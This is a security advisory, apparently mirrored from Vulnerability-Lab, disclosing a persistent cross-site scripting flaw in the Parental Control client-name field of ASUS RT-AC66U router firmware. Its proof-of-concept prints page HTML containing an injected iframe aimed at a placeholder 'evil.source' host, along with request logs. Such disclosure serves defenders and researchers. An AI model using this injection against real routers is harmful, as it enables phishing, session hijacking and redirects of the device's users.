Lucene search
K

ASUS WRT-AC66U 3.x Cross Site Scripting

🗓️ 11 Jul 2018 00:00:00Reported by Lawrence AmerType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 53 Views

ASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability in Client Name Input Field of Partental Control Modul

Code
`Document Title:  
===============  
ASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability  
  
  
References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=1993  
  
  
Release Date:  
=============  
2018-06-27  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
1993  
  
  
Common Vulnerability Scoring System:  
====================================  
3  
  
  
Vulnerability Class:  
====================  
Cross Site Scripting - Persistent  
  
  
Current Estimated Price:  
========================  
500a! - 1.000a!  
  
  
Product & Service Introduction:  
===============================  
802.11ac Dual-Band Wireless-AC1750 Gigabit Router. RT-AC66U supports  
several operation modes to meet  
different requirements. Please select the mode that match your  
situation. Wireless router mode (Default),  
Access Point(AP) mode or Media bridge. In wireless router/ IP sharing  
mode, RT-AC66U connects to the  
Internet via PPPoE, DHCP, PPTP, L2TP, or Static IP and shares the  
wireless network to LAN clients or  
devices. In this mode, NAT, firewall, and DHCP server are enabled by  
default. UPnP and Dynamic DNS  
are supported for SOHO and home users. Select this mode if you are a  
first-time user or you are not  
currently using any wired/wireless routers. The ASUS RT-AC66U is a 5th  
gen dual-band Wi-Fi router,  
and the launch platform for the new ASUS AiCloud service. Its speed  
reaches 1.75Gbps, utilizing the  
Broadcom 802.11ac Wi-Fi controller and working in 2.4GHz and 5GHz. The  
5GHz band supports up to 1.3Gbps,  
exceeding current Gigabit wired transmission and 3X faster than 802.11n.  
The RT-AC66U offers smooth  
lag-resistant multitasking and super-fast streaming, while ASUS AiRadar  
intelligently strengthens wireless  
connections via powerful amplification, offering future-proof optimized  
performance.  
  
(Copy of the Homepage: https://www.asus.com/Networking/RTAC66U/ )  
  
  
Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered mutliple  
cross site scripting vulnerabilities  
in the official ASUS Wireless Router RT Firmware v3.0.0.4.372_67.  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2018-06-27: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
ASUS  
Product: WRT - Wireless Router (UI) 3.0.0.4.372_67  
  
  
Exploitation Technique:  
=======================  
Local  
  
  
Severity Level:  
===============  
Medium  
  
  
Authentication Type:  
====================  
Restricted authentication (user/moderator) - User privileges  
  
  
User Interaction:  
=================  
Low User Interaction  
  
  
Disclosure Type:  
================  
Independent Security Research  
  
  
Technical Details & Description:  
================================  
A cross site scripting vulnerability has been discovered in the ASUS  
Wireless Router RT Firmware v3.0.0.4.372_67.  
The cross site scripting web vulnerability allows remote attackers to  
inject own malicious script codes on the  
application-side of the vulnerable function or service module.  
  
The cross site scripting vulnerability is located in the `Client Name`  
input field of the `Partental Control` modules.  
The input field for the client name is not secure parsed. Thus allows an  
attacker to manipulate the client list on index  
of the module. The request method to inject is POST and the attack  
vector is located on the application-side. Due to no  
reachable cookies in the panel ui, low privileged user accounts are only  
able to redirect or inject malware to the  
client-side for an execute. First the context is saved client-side and  
after using apply function the context is  
saved permanently to the image db.  
  
The security risk of the client-side cross site scripting web  
vulnerability is estimated as medium with a cvss  
(common vulnerability scoring system) count of 3.0. Exploitation of the  
client-side web vulnerability requires  
a privileged web-application user account and low user interaction.  
Successful exploitation of the vulnerability  
results in non-persistent phishing, session hijacking, non-persistent  
external redirect to malicious sources and  
client-side manipulation of affected or connected web module context.  
  
Request Method(s):  
[+] GET  
  
Vulnerable Module(s):  
[+] Parental Control  
  
Vulnerable Parameter(s):  
[+] Client Name  
  
  
Proof of Concept (PoC):  
=======================  
The cross site vulnerability can be exploited by remote attackers with  
privileged user account and low user interaction.  
For security demonstration or to reproduce the vulnerability follow the  
provided information and steps below to continue.  
  
  
PoC: Exploitation  
<tbody><tr><th title="Select all" width="5%" height="30px"><input  
id="selAll" onclick="selectAll(this, 0);"  
value="" type="checkbox"></th><th width="40%">Clients Name</th><th  
width="25%">Clients MAC Address</th><th width="10%">  
Time Management</th><th width="10%">Add / Delete</th></tr><tr><td  
style="border-bottom:2px solid #000;"  
title="Enable/Disable"><input id="newrule_Enable" checked=""  
type="checkbox"></td><td style="border-bottom:2px solid #000;">  
<input maxlength="32" style="margin-left:10px;float:left;width:255px;"  
class="input_20_table" name="PC_devicename"  
onkeypress="" onclick="hideClients_Block();"  
onblur="if(!over_var){hideClients_Block();}" type="text"><img  
id="pull_arrow"  
src="images/arrow-down.gif" onclick="pullLANIPList(this);" title="Select  
the device name of DHCP clients."  
onmouseover="over_var=1;" onmouseout="over_var=0;" height="14px;"><div  
id="ClientList_Block_PC" class="ClientList_Block_PC">  
<a><div onmouseover="over_var=1;" onmouseout="over_var=0;"  
onclick="setClientIP('JIEMING-NB', '50:E5:49:A2:00:F8');">  
<strong>192.168.1.166</strong> ( JIEMING-NB) </div></a><a><div  
onmouseover="over_var=1;" onmouseout="over_var=0;"  
onclick="setClientIP('JIEMING-MACBOOK',  
'98:4B:E1:CB:DA:D6');"><strong>192.168.1.188</strong> ( JIEMING-MACBOOK)  
</div></a>  
<a><div onmouseover="over_var=1;" onmouseout="over_var=0;"  
onclick="setClientIP('JIEMING-PC', 'A8:26:D9:31:2B:49');">  
<strong>192.168.1.161</strong> ( JIEMING-PC) </div></a><a><div  
onmouseover="over_var=1;" onmouseout="over_var=0;"  
onclick="setClientIP('A8:26:D9:31:2B:49',  
'A8:26:D9:31:2B:49');"><strong>192.168.1.210</strong> </div></a>  
<!--[if lte IE 6.5]><iframe  
class="hackiframe2"></iframe><![endif]--></div></td><td  
style="border-bottom:2px solid #000;">  
<input maxlength="17" class="input_macaddr_table" name="PC_mac"  
onkeypress="return is_hwaddr(this,event)"  
type="text"></td><td style="border-bottom:2px solid #000;">--</td><td  
style="border-bottom:2px solid #000;">  
<input class="url_btn" onclick="addRow_main(16)" value=""  
type="button"></td></tr><tr id="row0"><td title="1">  
<input onclick="genEnableArray_main(0,this);" checked=""  
type="checkbox"></td><td title=""></td>  
<td title="aa:aa:aa:aa:aa:aa">aa:aa:aa:aa:aa:aa</td><td><input  
class="service_btn" onclick="gen_lantowanTable(0);"  
value="" type="button"></td><td><input class="remove_btn"  
onclick="deleteRow_main(this);" value="" type="button"></td></tr>  
<tr id="row1"><td title="undefined"><input  
onclick="genEnableArray_main(1,this);" type="checkbox"></td>  
<td title="" <iframe="" src="evil.source"">"<iframe  
src="evil.source</td"><td title="undefined">undefined</td>  
<td><input class="service_btn" type="button"  
onclick="gen_lantowanTable(1);" value=""/></td><td><input  
class="remove_btn" type="button" onclick="deleteRow_main(this);"  
value=""/></td><tr id="row2"><td title="undefined">  
<input type="checkbox" onclick="genEnableArray_main(2,this);" /></td><td  
title=""></td><td title="undefined">undefined</td>  
<td><input class="service_btn" type="button"  
onclick="gen_lantowanTable(2);" value=""/></td><td>  
<input class="remove_btn" type="button" onclick="deleteRow_main(this);"  
value=""/>  
</td></tr></table></iframe></td></tr></tbody>  
  
  
--- PoC Session Logs [GET] ---  
Status: 304[Not Modified]  
GET http://event.localhost/nw/_ui/en/ParentalControl.html  
Mime Type[text/html]  
Request Header:  
Host[event.localhost]  
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)  
Gecko/20100101 Firefox/49.0]  
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]  
Referer[http://event.localhost/nw/_ui/en/Advanced_System_Content.html]  
Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]  
Connection[keep-alive]  
Upgrade-Insecure-Requests[1]  
If-Modified-Since[Thu, 20 Jun 2013 05:45:19 GMT]  
If-None-Match["31793159796dce1:0"]  
Cache-Control[max-age=0]  
Response Header:  
Content-Type[text/html]  
Last-Modified[Thu, 20 Jun 2013 05:45:19 GMT]  
Etag["31793159796dce1:0"]  
Connection[keep-alive]  
-  
Status: 200[OK]  
GET http://event.localhost/nw/_ui/en/evil.source%3C/td  
Mime Type[text/html]  
Request Header:  
Host[event.localhost]  
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)  
Gecko/20100101 Firefox/49.0]  
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]  
Referer[http://event.localhost/nw/_ui/en/ParentalControl.html]  
Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]  
Connection[keep-alive]  
Upgrade-Insecure-Requests[1]  
Response Header:  
Content-Type[text/html]  
Server[Microsoft-IIS/7.5]  
X-Powered-By[ASP.NET]  
Content-Length[1245]  
Connection[keep-alive]  
  
  
Reference(s):  
http://event.localhost/  
http://event.localhost/nw/  
http://event.localhost/nw/_ui/  
  
  
Solution - Fix & Patch:  
=======================  
The issue has been reported in 2016 Q4 (2016-11-09) and was finally  
resolved in 2017 Q3 - Q4 by the asus wrt developer team. The public  
disclosure process took about 10 month.  
  
  
Security Risk:  
==============  
The security risk of the persistent cross site scripting web  
vulnerability in the asus wrt ui is estimated as medium (CVSS 3.0).  
  
  
Credits & Authors:  
==================  
Lawrence Amer (Vulnerability Lab Core Research Team)  
[[email protected]] -  
https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without  
any warranty. Vulnerability Lab disclaims all warranties, either  
expressed or  
implied, including the warranties of merchantability and capability for  
a particular purpose. Vulnerability-Lab or its suppliers are not liable  
in any  
case of damage, including direct, indirect, incidental, consequential  
loss of business profits or special damages, even if Vulnerability Labs  
or its  
suppliers have been advised of the possibility of such damages. Some  
states do not allow the exclusion or limitation of liability mainly for  
incidental  
or consequential damages so the foregoing limitation may not apply. We  
do not approve or encourage anybody to break any licenses, policies, deface  
websites, hack into databases or trade with stolen data. We have no need  
for criminal activities or membership requests. We do not publish  
advisories  
or vulnerabilities of religious-, militant- and racist-  
hacker/analyst/researcher groups or individuals. We do not publish trade  
researcher mails,  
phone numbers, conversations or anything else to journalists,  
investigative authorities or private individuals.  
  
Domains: www.vulnerability-lab.com - www.vulnerability-db.com -  
www.evolution-sec.com  
Programs: vulnerability-lab.com/submit.php -  
vulnerability-lab.com/list-of-bug-bounty-programs.php -  
vulnerability-lab.com/register.php  
Feeds: vulnerability-lab.com/rss/rss.php -  
vulnerability-lab.com/rss/rss_upcoming.php -  
vulnerability-lab.com/rss/rss_news.php  
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab -  
youtube.com/user/vulnerability0lab  
  
Any modified copy or reproduction, including partially usages, of this  
file, resources or information requires authorization from Vulnerability  
Laboratory.  
Permission to electronically redistribute this alert in its unmodified  
form is granted. All other rights, including the use of other media, are  
reserved by  
Vulnerability Lab Research Team or its suppliers. All pictures, texts,  
advisories, source code, videos and other information on this website is  
trademark  
of vulnerability-lab team & the specific authors or managers. To record,  
list, modify, use or edit our material contact (admin@) to get an ask  
permission.  
  
Copyright A(c) 2018 | Vulnerability Laboratory - [Evolution  
Security GmbH]aC/  
  
  
  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation